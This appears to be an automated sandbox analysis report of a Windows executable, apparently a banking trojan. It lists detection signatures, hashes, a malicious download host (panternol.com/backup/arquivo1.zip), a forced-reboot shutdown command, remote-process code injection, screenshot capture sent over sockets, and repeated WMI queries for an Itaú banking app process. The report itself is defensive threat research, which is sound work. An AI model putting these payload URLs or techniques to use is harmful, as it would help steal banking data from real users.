Windows Analysis Report
leg#U00edvel9931-009-140.08372236.exe

Overview

General Information

Sample name: leg#U00edvel9931-009-140.08372236.exe
renamed because original name is a hash value
Original sample name: legvel9931-009-140.08372236.exe
Analysis ID: 1562226
MD5: f8720f77959acda03bd5b2b4a3698848
SHA1: 1ea4f348e20d35774a7db6a89c3d8fc274a9892b
SHA256: a8ba8a7be8a404f6398c3b3d5a3788f9e513210d0732fd5b0ffebc44af58de8b
Tags: exe, user-Porcupine

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Uses shutdown.exe to shutdown or reboot the system
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Shutdown
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

Source: leg#U00edvel9931-009-140.08372236.exe ReversingLabs: Detection: 21%
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_000000018000D4B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 7_2_000000018000D4B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 7_2_000000018000D4B0
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr
Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A528EDC FindFirstFileExW, 6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180055750 FindFirstFileExW, 6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 7_2_0000000180055750 FindFirstFileExW, 7_2_0000000180055750
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180013480 WSAStartup,GdiplusStartup,_Thrd_detach,Sleep,GetDesktopWindow,GetWindowRect,MagSetWindowSource,RedrawWindow,GdipCreateBitmapFromScan0,CLSIDFromString,CreateStreamOnHGlobal,GdipSaveImageToStream,GdipDisposeImage,send,send,closesocket,recv,closesocket,Sleep,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 6_2_0000000180013480
Source: global traffic HTTP traffic detected: GET /backup/arquivo1.zip HTTP/1.1 | Host: panternol.com | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET /cacher/ HTTP/1.1 | Host: panternol.com | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic DNS traffic detected: DNS query: panternol.com
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll1.3.1rbr
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://GODEBUGhttps://panterno1.1.1.1
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://panterno1.1.1.1
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://panternol.com/backup/arqR
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://panternol.com/backup/arqREQUEST_METHODpanternol.comiphlpapi.dll
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000090000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://panternol.com/backup/arquivo1.zip
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://panternol.com/cacher/
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://panternol.com/cacher/https://panternol.com/cacher/panternol.com
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180006010 GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,ReleaseDC,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,CreateStreamOnHGlobal,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToStream,DeleteObject,DeleteDC,ReleaseDC,DeleteObject,DeleteDC,ReleaseDC,GdipDisposeImage, 6_2_0000000180006010

System Summary

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy) 625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: String function: 000000018003B5A0 appears 52 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: String function: 000000018001C5F0 appears 188 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: String function: 000000018004EDF8 appears 60 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: String function: 0000000180038AAC appears 36 times
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Number of sections : 15 > 10
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameClassicIE.exe< vs leg#U00edvel9931-009-140.08372236.exe
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameClassicIE.exe< vs leg#U00edvel9931-009-140.08372236.exe
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Section: /19 ZLIB complexity 0.9993620227146043
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Section: /32 ZLIB complexity 0.996083361037234
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Section: /65 ZLIB complexity 0.9993609298945376
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Section: /78 ZLIB complexity 0.9931351902173913
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145963977.0000000002205000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBpD!
Source: classification engine Classification label: mal64.rans.evad.winEXE@6/6@1/1
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle, 6_2_00007FF6B40A1000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180005290 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 6_2_0000000180005290
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00000001800143F0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,_invalid_parameter_noinfo_noreturn, 6_2_00000001800143F0
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe File created: C:\Users\user\Microsoft.NET Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Mutant created: \Sessions\1\BaseNamedObjects\ManagerServiceAppMU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
